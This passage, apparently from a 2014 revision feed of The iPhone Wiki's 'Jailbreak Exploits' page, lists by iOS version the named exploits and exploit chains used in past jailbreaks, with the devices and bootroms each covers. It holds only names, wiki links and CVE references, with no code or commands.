* [[0x24000 Segment Overflow]] + [[ARM7 Go]] (from iOS 2.1.1) ([[n72ap|iPod touch 2G]])<br />
<br />
== Exploits which are used in order to jailbreak 3.x ==<br />
=== 3.0 / 3.0.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] ( [[n72ap|iPod touch 2G]])<br />
* [[Pwnage]] + [[iBoot Environment Variable Overflow]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] + [[iBoot Environment Variable Overflow]] ([[n72ap|iPod touch 2G]] and [[n88ap|iPhone 3GS]])<br />
=== 3.1 / 3.1.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together for [[untethered jailbreak]] on [[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[usb_control_msg(0x21, 2) Exploit]] ([[tethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.5.1|new bootrom]], [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], and [[n18ap|iPod touch 3G]])<br />
* [[0x24000 Segment Overflow]] + [[usb_control_msg(0x21, 2) Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]] and [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
=== 3.1.2 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together for [[untethered jailbreak]] on [[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[usb_control_msg(0x21, 2) Exploit]] ([[tethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.5.1|new bootrom]], [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], and [[n18ap|iPod touch 3G]])<br />
* [[0x24000 Segment Overflow]] + [[usb_control_msg(0x21, 2) Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]] and [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[MobileBackup Copy Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] (all devices, used in [[Spirit]])<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] (all devices, used in [[Star]])<br />
=== 3.1.3 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together for [[untethered jailbreak]] on [[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] (for [[n72ap|iPod touch 2G]] and [[n88ap|iPhone 3GS]] devices with older bootroms)<br />
** + [[Limera1n Exploit]] ([[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]], used in [[sn0wbreeze]])<br />
** + [[usb_control_msg(0xA1, 1) Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]], used in [[sn0wbreeze]])<br />
* [[usb_control_msg(0xA1, 1) Exploit]]+ [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.5.1|new bootrom]], used in [[sn0wbreeze]])<br />
* [[Limera1n Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] ([[N18ap|iPod touch 3G]] and [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], used in [[sn0wbreeze]])<br />
* [[MobileBackup Copy Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] (all devices, used in [[Spirit]])<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] (all devices, used in [[Star]])<br />
<br />
=== 3.2 ===<br />
* [[MobileBackup Copy Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] (all devices, used in [[Spirit]])<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] ([[k48ap|iPad]], used in [[Star]])<br />
* [[Limera1n Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] ([[K48ap|iPad]] used in [[sn0wbreeze]] 2.9.x)<br />
=== 3.2.1 ===<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] ([[k48ap|iPad]], used in [[Star]])<br />
* [[Limera1n Exploit]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] ([[k48ap|iPad]], used in [[sn0wbreeze]] 2.9.x)<br />
=== 3.2.2 ===<br />
* [[Limera1n Exploit]] + [[Packet Filter Kernel Exploit]] ([[k48ap|iPad]])<br />
<br />
== Exploits which are used in order to jailbreak 4.x ==<br />
=== 4.0 / 4.0.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] ([[n72ap|iPod touch 2G]] and [[n88ap|iPhone 3GS]] devices with older bootroms)<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] (all devices, used in [[Star]])<br />
* [[Limera1n Exploit]] + [[Packet Filter Kernel Exploit]] ([[n88ap|iPhone 3GS]] New bootrom, [[N18ap|iPod touch 3G]], [[n90ap|iPhone 4 (iPhone3,1)]])<br />
<br />
=== 4.0.2 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] ([[n72ap|iPod touch 2G]])<br />
* [[0x24000 Segment Overflow]] ([[n88ap|iPhone 3GS]])<br />
* [[limera1n]]'s bootrom exploit + [[Packet Filter Kernel Exploit]] ([[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[n90ap|iPhone 4 (iPhone3,1)]], and [[n81ap|iPod touch 4G]])<br />
<br />
=== 4.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[Packet Filter Kernel Exploit]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[n90ap|iPhone 4 (iPhone3,1)]], [[n81ap|iPod touch 4G]], and [[k66ap|Apple TV 2G]]))<br />
* [[usb_control_msg(0xA1, 1) Exploit]] + [[Packet Filter Kernel Exploit]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]])<br />
<br />
=== 4.2.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[HFS Legacy Volume Name Stack Buffer Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], [[n81ap|iPod touch 4G]], and [[k66ap|Apple TV 2G]])<br />
* [[usb_control_msg(0xA1, 1) Exploit]] + [[HFS Legacy Volume Name Stack Buffer Overflow]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]])<br />
<br />
=== 4.2.6 / 4.2.7 / 4.2.8 ===<br />
* [[limera1n]]'s bootrom exploit + [[HFS Legacy Volume Name Stack Buffer Overflow]] (together for [[untethered jailbreak]] on [[n92ap|iPhone 4 (iPhone3,3)]])<br />
* [[T1 Font Integer Overflow]] (used for [[Saffron]])<br />
<br />
=== 4.2.9 / 4.2.10 ===<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak on [[n92ap|iPhone 4 (iPhone3,3)]])<br />
<br />
=== 4.3 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit ([[tethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], [[n81ap|iPod touch 4G]], and [[k66ap|Apple TV 2G]])<br />
* [[T1 Font Integer Overflow]] (used for [[Saffron]])<br />
<br />
=== 4.3.1 / 4.3.2 / 4.3.3 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[ndrv_setspec() Integer Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], and [[n81ap|iPod touch 4G]])<br />
* [[T1 Font Integer Overflow]] (used for [[Saffron]])<br />
<br />
=== 4.3.4 / 4.3.5 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], and [[n81ap|iPod touch 4G]])<br />
<br />
== Exploits which are used in order to jailbreak 5.x ==<br />
=== 5.0 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[Racoon String Format Overflow Exploit]] (used both for payload injection and untether)+[[HFS Heap Overflow]]- [[n94ap|iPhone 4S]] only<br />
<br />
===5.0.1===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[Racoon String Format Overflow Exploit]]+[[HFS Heap Overflow]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[Racoon String Format Overflow Exploit]] (used both for payload injection and untether)+[[HFS Heap Overflow]] - [[iPad 2]] and [[iPhone 4S]] with [[Absinthe]]<br />
<br />
===5.1===<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
<br />
===5.1.1===<br />
* [[limera1n Exploit]] + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n Exploit]] + [[Rocky Racoon]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[iPhone 4]], [[n18ap|iPod touch 3G]], and [[n81ap|iPod touch 4G]])<br />
<br />
== Exploits which are used in order to jailbreak 6.x ==<br />
=== 6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2 ===<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[Symbolic Link Vulnerability]]<br />
* [[Timezone Vulnerability]]<br />
* [[Shebang Trick]]<br />
* [[AMFID code signing evasion]]<br />
* [[launchd.conf untether]]<br />
* [[IOUSBDeviceFamily Vulnerability]]<br />
* [[ARM Exception Vector Info Leak]]<br />
* [[dynamic memmove() locating]]<br />
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]<br />
* [[kernel memory write via ROP gadget]]<br />
<br />
=== 6.1.3 / 6.1.4 / 6.1.5 / 6.1.6 ===<br />
*[[Symbolic_Link_Vulnerability]] (Used by [[p0sixspwn]] to write to the file system in /var, also used in [[evasi0n]] and [[evasi0n7]])<br />
*[[launchd.conf untether]]<br />
*[[AMFID_code_signing_evasion]]<br />
*[[posix_spawn kernel information leak]]<br />
<br />
== Exploits which are used in order to jailbreak 7.x ==<br />
=== 7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6 ===<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5133 CVE-2013-5133]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1272 CVE-2014-1272]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1273 CVE-2014-1273]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3948 CVE-2013-3948]<br />
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1278 CVE-2014-1278]<br />
<br />
=== 7.1 / 7.1.1 ===<br />
*[[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&diff=41040
Jailbreak Exploits
2014-05-06T01:07:39Z
<p>Ryandolan123: </p>
<hr />
<div>This page lists the exploits used in [[Jailbreak]]s.<br />
== Exploits which were used in order to jailbreak 1.x ==<br />
=== 1.0.2 ===<br />
* [[Restore Mode]] ([[iBoot (Bootloader)|iBoot]] had a command named cp, which had access to the whole filesystem)<br />
=== 1.1.1 ===<br />
* [[Symlinks]] (an upgrade jailbreak)<br />
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]])<br />
=== 1.1.2 ===<br />
* [[Mknod]] (an upgrade jailbreak)<br />
=== 1.1.3 / 1.1.4 / 1.1.5 ===<br />
* [[Soft Upgrade]] (an upgrade jailbreak)<br />
* [[Ramdisk Hack]]<br />
* [[Dual Boot Exploit]] - Works up to [[iOS]] 2.0 beta 3<br />
* [[diags]] - Works up to [[iOS]] 2.0 beta 5<br />
<br />
== Exploits which are used in order to jailbreak 2.x ==<br />
=== 2.0 / 2.0.1 / 2.0.2 / 2.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]]<br />
=== 2.1.1 ===<br />
* [[ARM7 Go]] ([[tethered jailbreak]])<br />
=== 2.2 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
=== 2.2.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] + [[ARM7 Go]] (from iOS 2.1.1) ([[n72ap|iPod touch 2G]])<br />
<br />
== Exploits which are used in order to jailbreak 3.x ==<br />
=== 3.0 / 3.0.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] ( [[n72ap|iPod touch 2G]])<br />
* [[Pwnage]] + [[iBoot Environment Variable Overflow]] ([[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] + [[iBoot Environment Variable Overflow]] ([[n72ap|iPod touch 2G]] and [[n88ap|iPhone 3GS]])<br />
=== 3.1 / 3.1.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together for [[untethered jailbreak]] on [[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[usb_control_msg(0x21, 2) Exploit]] ([[tethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.5.1|new bootrom]], [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], and [[n18ap|iPod touch 3G]])<br />
* [[0x24000 Segment Overflow]] + [[usb_control_msg(0x21, 2) Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]] and [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
=== 3.1.2 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together for [[untethered jailbreak]] on [[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[usb_control_msg(0x21, 2) Exploit]] ([[tethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.5.1|new bootrom]], [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], and [[n18ap|iPod touch 3G]])<br />
* [[0x24000 Segment Overflow]] + [[usb_control_msg(0x21, 2) Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]] and [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[MobileBackup Copy Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] (all devices, used in [[Spirit]])<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] (all devices, used in [[Star]])<br />
=== 3.1.3 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together for [[untethered jailbreak]] on [[m68ap|iPhone]], [[n45ap|iPod touch]], and [[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] (for [[n72ap|iPod touch 2G]] and [[n88ap|iPhone 3GS]] devices with older bootroms)<br />
** + [[Limera1n Exploit]] ([[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]], used in [[sn0wbreeze]])<br />
** + [[usb_control_msg(0xA1, 1) Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]], used in [[sn0wbreeze]])<br />
* [[usb_control_msg(0xA1, 1) Exploit]]+ [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] ([[n72ap|iPod touch 2G]] [[Bootrom 240.5.1|new bootrom]], used in [[sn0wbreeze]])<br />
* [[Limera1n Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] ([[N18ap|iPod touch 3G]] and [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], used in [[sn0wbreeze]])<br />
* [[MobileBackup Copy Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] (all devices, used in [[Spirit]])<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] (all devices, used in [[Star]])<br />
<br />
=== 3.2 ===<br />
* [[MobileBackup Copy Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] (all devices, used in [[Spirit]])<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] ([[k48ap|iPad]], used in [[Star]])<br />
* [[Limera1n Exploit]] + [[Incomplete Codesign Exploit]] + [[BPF_STX Kernel Write Exploit]] ([[K48ap|iPad]] used in [[sn0wbreeze]] 2.9.x)<br />
=== 3.2.1 ===<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] ([[k48ap|iPad]], used in [[Star]])<br />
* [[Limera1n Exploit]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] ([[k48ap|iPad]], used in [[sn0wbreeze]] 2.9.x)<br />
=== 3.2.2 ===<br />
* [[Limera1n Exploit]] + [[Packet Filter Kernel Exploit]] ([[k48ap|iPad]])<br />
<br />
== Exploits which are used in order to jailbreak 4.x ==<br />
=== 4.0 / 4.0.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[n82ap|iPhone 3G]])<br />
* [[0x24000 Segment Overflow]] ([[n72ap|iPod touch 2G]] and [[n88ap|iPhone 3GS]] devices with older bootroms)<br />
* [[Malformed CFF Vulnerability]] + [[Incomplete Codesign Exploit]] + [[IOSurface Kernel Exploit]] (all devices, used in [[Star]])<br />
* [[Limera1n Exploit]] + [[Packet Filter Kernel Exploit]] ([[n88ap|iPhone 3GS]] New bootrom, [[N18ap|iPod touch 3G]], [[n90ap|iPhone 4 (iPhone3,1)]])<br />
<br />
=== 4.0.2 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] ([[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] ([[n72ap|iPod touch 2G]])<br />
* [[0x24000 Segment Overflow]] ([[n88ap|iPhone 3GS]])<br />
* [[limera1n]]'s bootrom exploit + [[Packet Filter Kernel Exploit]] ([[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[n90ap|iPhone 4 (iPhone3,1)]], and [[n81ap|iPod touch 4G]])<br />
<br />
=== 4.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[Packet Filter Kernel Exploit]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[n90ap|iPhone 4 (iPhone3,1)]], [[n81ap|iPod touch 4G]], and [[k66ap|Apple TV 2G]]))<br />
* [[usb_control_msg(0xA1, 1) Exploit]] + [[Packet Filter Kernel Exploit]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]])<br />
<br />
=== 4.2.1 ===<br />
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[n82ap|iPhone 3G]])<br />
* [[ARM7 Go]] (from iOS 2.1.1) + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]] [[Bootrom 240.4|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[HFS Legacy Volume Name Stack Buffer Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], [[n81ap|iPod touch 4G]], and [[k66ap|Apple TV 2G]])<br />
* [[usb_control_msg(0xA1, 1) Exploit]] + [[HFS Legacy Volume Name Stack Buffer Overflow]] (together for [[untethered jailbreak]] on [[n72ap|iPod touch 2G]])<br />
<br />
=== 4.2.6 / 4.2.7 / 4.2.8 ===<br />
* [[limera1n]]'s bootrom exploit + [[HFS Legacy Volume Name Stack Buffer Overflow]] (together for [[untethered jailbreak]] on [[n92ap|iPhone 4 (iPhone3,3)]])<br />
* [[T1 Font Integer Overflow]] (used for [[Saffron]])<br />
<br />
=== 4.2.9 / 4.2.10 ===<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak on [[n92ap|iPhone 4 (iPhone3,3)]])<br />
<br />
=== 4.3 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit ([[tethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], [[n81ap|iPod touch 4G]], and [[k66ap|Apple TV 2G]])<br />
* [[T1 Font Integer Overflow]] (used for [[Saffron]])<br />
<br />
=== 4.3.1 / 4.3.2 / 4.3.3 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[ndrv_setspec() Integer Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], and [[n81ap|iPod touch 4G]])<br />
* [[T1 Font Integer Overflow]] (used for [[Saffron]])<br />
<br />
=== 4.3.4 / 4.3.5 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[n90ap|iPhone 4 (iPhone3,1)]], and [[n81ap|iPod touch 4G]])<br />
<br />
== Exploits which are used in order to jailbreak 5.x ==<br />
=== 5.0 ===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[Racoon String Format Overflow Exploit]] (used both for payload injection and untether)+[[HFS Heap Overflow]]- [[n94ap|iPhone 4S]] only<br />
<br />
===5.0.1===<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n]]'s bootrom exploit + [[Racoon String Format Overflow Exploit]]+[[HFS Heap Overflow]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[Racoon String Format Overflow Exploit]] (used both for payload injection and untether)+[[HFS Heap Overflow]] - [[iPad 2]] and [[iPhone 4S]] with [[Absinthe]]<br />
<br />
===5.1===<br />
* [[limera1n]]'s bootrom exploit (Tethered jailbreak) on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[n18ap|iPod touch 3G]], [[k48ap|iPad]], [[iPhone 4]], and [[n81ap|iPod touch 4G]])<br />
* [[limera1n]]'s bootrom exploit + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
<br />
===5.1.1===<br />
* [[limera1n Exploit]] + [[0x24000 Segment Overflow]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]])<br />
* [[limera1n Exploit]] + [[Rocky Racoon]] (together for [[untethered jailbreak]] on [[n88ap|iPhone 3GS]] with [[Bootrom 359.3.2|new bootrom]], [[iPhone 4]], [[n18ap|iPod touch 3G]], and [[n81ap|iPod touch 4G]])<br />
<br />
== Exploits which are used in order to jailbreak 6.x ==<br />
=== 6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2 ===<br />
